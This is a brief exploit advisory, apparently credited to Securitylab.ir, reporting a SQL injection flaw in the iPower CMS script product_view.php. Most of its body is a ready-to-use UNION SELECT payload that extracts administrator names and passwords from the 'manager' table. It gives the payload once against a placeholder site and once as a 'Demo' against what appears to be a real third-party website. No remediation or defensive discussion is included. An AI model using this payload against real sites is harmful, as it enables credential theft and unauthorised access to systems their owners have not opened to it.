iPower CMS suffers from a remote SQL injection vulnerability in product_view.php.
543b6bc1b5e2b851f0aec9c00303c1e0ffb46acd8bf1240440a10623b8cf55f7
######################### Securitylab.ir ########################
# Application Info:
# Name: iPower CMS
# Website: http://www.dingwei.cn
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql injection
# Risk: Medium
#===========================================================
# Exploit:
# http://site.com/product_view.php?id=[] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from manager--
#
# Demo:
# http://www.bblbao.com/product_view.php?id=1019 and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,name,13,14,15,password,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from manager--
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################